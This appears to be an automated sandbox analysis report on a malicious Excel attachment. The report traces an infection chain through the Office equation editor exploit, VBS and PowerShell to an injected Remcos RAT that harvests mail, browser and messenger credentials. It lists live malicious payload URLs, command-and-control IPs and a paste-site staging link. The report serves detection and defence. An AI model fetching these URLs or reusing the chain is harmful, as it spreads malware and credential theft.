Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ESMTPPassword 30_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 30_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 30_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4480, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-NVSJ5U
Yara detected Remcos RAT
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000555000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: cmd.exe 28_2_0040569A
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435412 Sample: INQUIRY#46789.xla.xlsx Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 82 pop.tg 2->82 108 Snort IDS alert for network traffic 2->108 110 Multi AV Scanner detection for domain / URL 2->110 112 Found malware configuration 2->112 114 26 other signatures 2->114 11 EXCEL.EXE 7 23 2->11         started        15 chrome.exe 4 2->15         started        17 chrome.exe 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 98 pop.tg 172.67.206.230, 49161, 49163, 49164 CLOUDFLARENETUS United States 11->98 100 107.175.242.96, 49162, 49166, 49187 AS-COLOCROSSINGUS United States 11->100 80 beautifulroseipict...airbeautiful[1].doc, Rich 11->80 dropped 21 wscript.exe 11 11->21         started        25 WINWORD.EXE 336 37 11->25         started        102 192.168.2.5 unknown unknown 15->102 104 239.255.255.250 unknown Reserved 15->104 28 chrome.exe 15->28         started        30 chrome.exe 17->30         started        32 chrome.exe 19->32         started        34 chrome.exe 19->34         started        36 chrome.exe 19->36         started        38 4 other processes 19->38 file6 process7 dnsIp8 88 paste.ee 21->88 90 paste.ee 104.21.84.67, 443, 49167 CLOUDFLARENETUS United States 21->90 126 System process connects to network (likely due to code injection or exploit) 21->126 128 Suspicious powershell command line found 21->128 130 Wscript starts Powershell (via cmd or directly) 21->130 140 5 other signatures 21->140 40 powershell.exe 4 21->40         started        92 pop.tg 25->92 68 C:\Users\user\AppData\Roaming\...\pop.tg.url, MS 25->68 dropped 70 C:\Users\user\AppData\Roaming\...\D1ae4.url, MS 25->70 dropped 72 ~WRF{22E766A3-CA3D...5-FF71E53845DC}.tmp, Composite 25->72 dropped 74 C:\Users\user\AppData\Local\...\49740FD3.doc, Rich 25->74 dropped 132 Microsoft Office launches external ms-search protocol handler (WebDAV) 25->132 134 Office viewer loads remote template 25->134 136 Microsoft Office drops suspicious files 25->136 43 EQNEDT32.EXE 12 25->43         started        94 www.google.com 172.217.1.4, 443, 49170, 49172 GOOGLEUS United States 28->94 96 google.com 28->96 file9 138 Connects to a pastebin service (likely for C&C) 88->138 signatures10 process11 file12 142 Suspicious powershell command line found 40->142 144 Suspicious execution chain found 40->144 46 powershell.exe 13 6 40->46         started        76 C:\Users\...\beautifulpictureforcouples.vbs, Unicode 43->76 dropped 78 C:\...\beautifulrosepictureforcuple[1].gif, Unicode 43->78 dropped 146 Office equation editor establishes network connection 43->146 148 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 43->148 signatures13 process14 dnsIp15 106 uploaddeimagens.com.br 172.67.215.45, 443, 49181, 49186 CLOUDFLARENETUS United States 46->106 158 Creates autostart registry keys with suspicious values (likely registry only malware) 46->158 160 Writes to foreign memory regions 46->160 162 Injects a PE file into a foreign processes 46->162 50 RegAsm.exe 46->50         started        54 cmd.exe 46->54         started        signatures16 process17 dnsIp18 84 107.172.31.178, 2404, 49188, 49189 AS-COLOCROSSINGUS United States 50->84 86 geoplugin.net 178.237.33.50, 49190, 80 ATOM86-ASATOM86NL Netherlands 50->86 116 Contains functionality to bypass UAC (CMSTPLUA) 50->116 118 Detected Remcos RAT 50->118 120 Tries to steal Mail credentials (via file registry) 50->120 124 6 other signatures 50->124 57 RegAsm.exe 50->57         started        60 RegAsm.exe 50->60         started        62 RegAsm.exe 50->62         started        64 3 other processes 50->64 66 C:\ProgramData\sabelianos.vbs, ASCII 54->66 dropped 122 Command shell drops VBS files 54->122 file19 signatures20 process21 signatures22 150 Tries to steal Instant Messenger accounts or passwords 57->150 152 Tries to steal Mail credentials (via file / registry access) 57->152 154 Searches for Windows Mail specific files 57->154 156 Tries to harvest and steal browser information (history, passwords, etc) 62->156
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
107.172.31.178
 unknown United States
36352 AS-COLOCROSSINGUS true
104.21.84.67
 paste.ee United States
13335 CLOUDFLARENETUS false
172.67.215.45
 uploaddeimagens.com.br United States
13335 CLOUDFLARENETUS true
172.217.1.4
 www.google.com United States
15169 GOOGLEUS false
172.67.206.230
 pop.tg United States
13335 CLOUDFLARENETUS true
239.255.255.250
 unknown Reserved
unknown unknown false
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
107.175.242.96
 unknown United States
36352 AS-COLOCROSSINGUS true

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
google.com 142.251.41.78 true
paste.ee 104.21.84.67 true
geoplugin.net 178.237.33.50 true
www.google.com 172.217.1.4 true
uploaddeimagens.com.br 172.67.215.45 true
pop.tg 172.67.206.230 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://paste.ee/d/0FQ71 false
    		high
    https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGM3czrEGIjA-kmni6OpCb0sK0OJXQ-xgahRJhOOfp9sjhLJd6-GVaRKXjhN1j2AjiNvlTeHQJ0kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
      		high
      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKXdzrEGIjB41r-JEwv8u4RzZMcO3uf3_AVoLOwrfZ1qWrP1Y7YHnyIzpJ09Xc86C2JU0Bi2aeUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
        		high
        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGK7dzrEGIjDq-mFFkbgFVaqY36H785yGShiPXuv9YMW_Y12o7PZkmsAwZQOjvC-0xZLraM2rZywyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
          		high
          http://107.175.242.96/9020/KBFF.txt true
          • Avira URL Cloud: safe
          		 unknown
          http://107.175.242.96/9020/beautifulrosepictureforcuple.gif true
          • Avira URL Cloud: safe
          		 unknown
          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGOzdzrEGIjD4BYm6o4hKCYiqPjxXvkfZ2ovXRpRUm6SnG4gMqKAQ4dBvO8srgL5uNXO3jWFzVVcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
            		high
            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
              		high
              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKPezrEGIjCsnXwudwDFqZVXvPrN4Rob7Uu6w6Tk7hmROQ1W_bSdQYUdlOKA93zBi4dQB7GohcYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                		high
                https://www.google.com/chrome/whats-new/m109?internal=true false
                  		high
                  https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKPezrEGIjB8ma4QuYTZNgTcsXoznRrMlKWcGC6U5UXRLLGhWy8cGILU-cp1VshwnRzJEnE8yEEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                    		high
                    https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGK7dzrEGIjB-lB3Hfh_-grAroUfQ4ulZayQnQ3jYD8g4ouSleSBRPOPVtIe6ARSkXUqQqBbXlGMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                      		high
                      https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGK7dzrEGIjAgKvCcnwg6hTnJngfc9eaYgHGDI79MptO06svH8vUkRmA0qhByG2uNJZTJErrbtzMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                        		high
                        https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGNXdzrEGIjD1MJOBAZ8nZtfVYeKIBfX03XxbdgYCqeCJ1ArvmL45jK3mHxtysW1beDmZztvCZw0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                          		high
                          107.172.31.178 true
                          • 15%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		 unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGP3czrEGIjAXIG4uWsMc1yHwGtbWnQ4BrBFLGzkrT3CpFRrCGx74-yixjHV6JAEPUuq6MDX-WosyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                            		high
                            https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGIndzrEGIjAWPrWKos41NT4kmtwOzV0So1qqWn5ONKLkds_6fO99Z83kO0tED8KmXN17uSmsMb4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                              		high
                              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGNXdzrEGIjDeVoNnGK_GApW0nItKIOjxmbXH37fH625ketxhzwrf8wZW5xn9h04112noRcT8ufgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                		high
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGPrdzrEGIjD62BF9VLil3q7TBHlgAoNwZbQ57mjRTqpirCuZCcht2cAGpDc-noXcoTbNMkmgGOcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                  		high
                                  https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGOzdzrEGIjCfBvE4KZSZqQDo_mkN-yIUb4l04OpYUnN-_hx9hfvdk99ntwcCm2FPKZvYcHn8Q8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                    		high
                                    https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKPezrEGIjABKxFQJzBLGls7WBQxFnozyFcUzn392-T_NeJPX_-UAx8xrieHN30kYw1dxFVn4hoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                      		high
                                      http://107.175.242.96/9020/KBO/beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful.doc true
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIndzrEGIjB0ZZgq5v5iPP5i9AevO7TxIMVCQ7xcfFi2Nbu1H-ak-I-R3dc52fJoY_ZFhpfWqjwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                        		high
                                        https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGOzdzrEGIjCKF70bFjbPy54pl9_7pZMp1HqF5_Gw5IhtTtRMmmIqlnyFWm5JdONgkFudsvQHPE4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                          		high
                                          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGP3czrEGIjBmWrrWv04dQi66TiEKCyc8WmpF7SUcXBS_pm4LOE_wEtYKIhHCHVOYQHcKb14RilQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                            		high
                                            https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPrdzrEGIjBSZezThE0VlB5syruPfQ0MF7f9-btF8DEU_uZA1mJxV0vvucs3pOniQyrvmvmqITgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
                                              		high
                                              https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 true
                                              • 15%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		 unknown